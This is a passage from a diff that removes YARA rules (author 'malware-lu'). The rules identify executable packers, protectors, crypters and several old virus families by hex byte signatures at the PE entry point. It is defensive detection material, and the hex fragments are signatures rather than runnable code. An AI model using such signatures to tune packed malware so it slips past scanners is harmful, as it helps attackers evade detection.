FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnnamedScrambler11Cp0ke
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 E4 53 56 33 C0 89 45 E4 89 45 E8 89 45 EC B8 C0 47 00 10 E8 4F F3 FF FF BE 5C 67 00 10 33 C0 55 68 D2 4A 00 10 64 FF 30 64 89 20 E8 EB DE FF FF E8 C6 F8 FF FF BA E0 4A 00 10 B8 CC 67 00 10 E8 5F F8 FF FF 8B D8 8B D6 8B C3 8B 0D CC 67 00 10 E8 3A DD FF FF 8B 46 50 8B D0 B8 D4 67 00 10 E8 5B EF FF FF B8 D4 67 00 10 E8 09 EF FF FF 8B D0 8D 46 14 8B 4E 50 E8 14 DD FF FF 8B 46 48 8B D0 B8 D8 67 00 ?? ?? ?? ?? ?? FF B8 D8 67 00 10 E8 E3 EE FF FF 8B D0 8B C6 8B 4E 48 E8 EF DC FF FF FF 76 5C FF 76 58 FF 76 64 FF 76 60 B9 D4 67 00 10 8B 15 D8 67 00 10 A1 D4 67 00 10 E8 76 F6 FF FF A1 D4 67 00 10 E8 5C EE FF FF 8B D0 B8 CC 67 00 10 E8 CC F7 FF FF 8B D8 B8 DC 67 00 10 }
-
-condition:
-		$a0
-}
-	
-	
-rule y0dasCrypterv1xModified
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? B9 ?? ?? 00 00 8D BD ?? ?? ?? ?? 8B F7 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov252b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 B0 ?? ?? ?? 68 60 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 24 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv036betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C }
-	$a1 = { BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 82 8E FE FF FF 58 8B 4E 40 5F E3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule VxNecropolis
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 FC AD 33 C2 AB 8B D0 E2 F8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WinUpackv039finalrelocatedimagebaseByDwingc2005h2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD 03 C3 50 97 AD 91 F3 A5 5E AD 56 91 01 1E AD E2 FB AD 8D 6E 10 01 5D 00 8D 7D 1C B5 ?? F3 AB 5E AD 53 50 51 97 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv1061bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule aPackv062
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 06 8C C8 8E D8 ?? ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv071
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ED 10 00 00 C3 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv070
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 BD 10 00 00 C3 83 E2 00 F9 75 FA 70 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Ningishzida10CyberDoom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 96 E8 00 00 00 00 5D 81 ED 03 25 40 00 B9 04 1B 00 00 8D BD 4B 25 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectSKE21xdllAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PAVCryptorPawningAntiVirusCryptormasha_dev
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 56 57 55 BB 2C ?? ?? 70 BE 00 30 00 70 BF 20 ?? ?? 70 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 00 70 00 74 06 FF 15 54 30 00 70 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 1C 30 00 70 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 14 30 00 70 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 8F FA FF FF FF 15 20 30 00 70 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 70 00 74 06 FF 15 10 ?? ?? 70 8B 06 50 E8 A9 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 00 70 E8 26 FF FF FF C3 90 8F 05 04 30 00 70 E9 E9 FF FF FF C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule ExeShieldCryptor13RCTomCommander
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 8C 21 40 00 B9 51 2D 40 00 81 E9 E6 21 40 00 8B D5 81 C2 E6 21 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrinklerV01V02RuneLHStubbeandAskeSimonChristensen
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxGRUNT4Family
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 1C 00 8D 9E 41 01 40 3E 8B 96 14 03 B9 EA 00 87 DB F7 D0 31 17 83 C3 02 E2 F7 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule nPackV112002006BetaNEOxuinC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 EC 01 00 00 E8 F8 06 00 00 E8 03 06 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxEddie1800
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPEV22006115WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 45 50 45 3A 20 45 6E 63 72 79 70 74 50 45 20 56 32 2E 32 30 30 36 2E 31 2E 31 35 }
-
-condition:
-		$a0
-}
-	
-	
-rule PrincessSandyv10eMiNENCEProcessPatcherPatch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 27 11 40 00 E8 3C 01 00 00 6A 00 E8 41 01 00 00 A3 00 20 40 00 8B 58 3C 03 D8 0F B7 43 14 0F B7 4B 06 8D 7C 18 18 81 3F 2E 4C 4F 41 74 0B 83 C7 28 49 75 F2 E9 A7 00 00 00 8B 5F 0C 03 1D 00 20 40 00 89 1D 04 20 40 00 8B FB 83 C7 04 68 4C 20 40 00 68 08 }
-
-condition:
-		$a0
-}
-	
-	
-rule aPackv082
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 06 8C CB BA ?? ?? 03 DA 8D ?? ?? ?? FC 33 F6 33 FF 48 4B 8E C0 8E DB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NJoiner01AsmVersionNEX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 68 00 14 40 00 68 00 10 40 00 6A 00 E8 14 00 00 00 6A 00 E8 13 00 00 00 CC FF 25 AC 12 40 00 FF 25 B0 12 40 00 FF 25 B4 12 40 00 FF 25 B8 12 40 00 FF 25 BC 12 40 00 FF 25 C0 12 40 00 FF 25 C4 12 40 00 FF 25 C8 12 40 00 FF 25 CC 12 40 00 FF 25 D0 12 40 00 FF 25 D4 12 40 00 FF 25 D8 12 40 00 FF 25 DC 12 40 00 FF 25 E4 12 40 00 FF 25 EC 12 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsiduim1304ObsiduimSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02FSG131Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01CodeSafe20Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01NorthStarPEShrinker13Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ocBat2Exe10OC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 58 3C 40 00 E8 6C FA FF FF 33 C0 55 68 8A 3F 40 00 64 FF 30 64 89 20 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 81 E9 FF FF 8B 45 EC E8 41 F6 FF FF 50 E8 F3 FA FF FF 8B F8 83 FF FF 0F 84 83 02 00 00 6A 02 6A 00 6A EE 57 E8 FC FA FF FF 6A 00 68 60 99 4F 00 6A 12 68 18 57 40 00 57 E8 E0 FA FF FF 83 3D 60 99 4F 00 12 0F 85 56 02 00 00 8D 45 E4 50 8D 45 E0 BA 18 57 40 00 B9 40 42 0F 00 E8 61 F4 FF FF 8B 45 E0 B9 12 00 00 00 BA 01 00 00 00 E8 3B F6 FF FF 8B 45 E4 8D 55 E8 E8 04 FB ?? ?? ?? ?? E8 B8 58 99 4F 00 E8 67 F3 FF FF 33 C0 A3 60 99 4F 00 8D 45 DC 50 B9 05 00 00 00 BA 01 00 00 00 A1 58 99 4F 00 E8 04 F6 FF FF 8B 45 DC BA A4 3F 40 00 E8 E3 F4 FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule ASDPack20asd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8D 49 00 1F 01 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 90 }
-	$a1 = { 5B 43 83 7B 74 00 0F 84 08 00 00 00 89 43 14 E9 }
-	$a2 = { 8B 44 24 04 56 57 53 E8 CD 01 00 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 }
-
-condition:
-		$a0 or $a1 or $a2 at pe.entry_point
-}
-	
-	
-rule EXECryptor2021protectedIAT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A4 ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? 94 ?? ?? ?? D8 ?? ?? ?? 00 00 00 00 FF FF FF FF B8 ?? ?? ?? D4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 }
-
-condition:
-		$a0
-}
-	
-	
-rule ShrinkWrapv14
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 58 60 8B E8 55 33 F6 68 48 01 ?? ?? E8 49 01 ?? ?? EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnknownbySMT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 ?? ?? 57 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01VOBProtectCD5Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 36 3E 26 8A C0 60 E8 00 00 00 00 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePack10Xbagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA 6A 00 FF 93 ?? ?? 00 00 89 C5 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 8B 86 88 00 00 00 09 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThemidaWinLicenseV18XV19XOreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEjoinerAmok
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A1 14 A1 40 00 C1 E0 02 A3 18 A1 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EmbedPEv124cyclotron
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 50 60 68 ?? ?? ?? ?? E8 CB FF 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv04xv05x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov301v305
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DingBoysPElockv007
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 23 35 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule mPack003DeltaAziz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 33 C0 89 45 F0 B8 A8 76 00 10 E8 67 C4 FF FF 33 C0 55 68 C2 78 00 10 64 FF 30 64 89 20 8D 55 F0 33 C0 E8 93 C8 FF FF 8B 45 F0 E8 87 CB FF FF A3 08 A5 00 10 33 C0 55 68 A5 78 00 10 64 FF 30 64 89 20 A1 08 A5 00 10 E8 FA C9 FF FF 83 F8 FF 75 0A E8 88 B2 FF FF E9 1B 01 00 00 C7 05 14 A5 00 10 32 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 C9 C9 FF FF BA 14 A5 00 10 A1 08 A5 00 10 B9 04 00 00 00 E8 C5 C9 FF FF 83 3D 14 A5 00 10 32 77 0A E8 47 B2 FF FF E9 DA 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 92 C9 FF FF BA 18 A5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SixtoFourv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 55 4C 50 83 ?? ?? FC BF ?? ?? BE ?? ?? B5 ?? 57 F3 A5 C3 33 ED }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoinerSmallbuild029GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 32 C4 8A C3 58 E8 DE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThemidaWinLicenseV1XNoCompressionSecureEngineOreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule WinUpackv030betaByDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 }
-	$a1 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule Armadillov260b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 90 ?? ?? ?? 68 24 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 60 ?? ?? ?? 33 D2 8A D4 89 15 3C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov260b1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 50 ?? ?? ?? 68 74 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeLockerv10IonIce
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00 3E 8F 85 6C 00 00 00 3E 8F 85 68 00 00 00 3E 8F 85 64 00 00 00 3E 8F 85 60 00 00 00 3E 8F 85 5C 00 00 00 3E 8F 85 58 00 00 00 3E 8F 85 54 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV10betaap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PellesC300400450EXEX86CRTDLL
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 C7 45 FC ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE ?? ?? ?? ?? EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BeRoEXEPackerv100LZBRRBeRoFarbrausch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov190a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 64 FF 68 10 F2 40 00 68 14 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4Modified
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule APatchGUIv11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 52 31 C0 E8 FF FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeSafeguardv10simonzh
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C0 5D EB 4E EB 47 DF 69 4E 58 DF 59 74 F3 EB 01 DF 75 EE 9A 59 9C 81 C1 E2 FF FF FF EB 01 DF 9D FF E1 E8 51 E8 EB FF FF FF DF 22 3F 9A C0 81 ED 19 18 40 00 EB 48 EB 47 DF 69 4E 58 DF 59 79 EE EB 01 DF 78 E9 DF 59 9C 81 C1 E5 FF FF FF 9D FF E1 EB 51 E8 EE }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01CDCopsIIAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeVIRUSIWormHybrisFEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 16 A8 54 00 00 47 41 42 4C 4B 43 47 43 00 00 00 00 00 00 52 49 53 00 FC 68 4C 70 40 00 FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1322ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
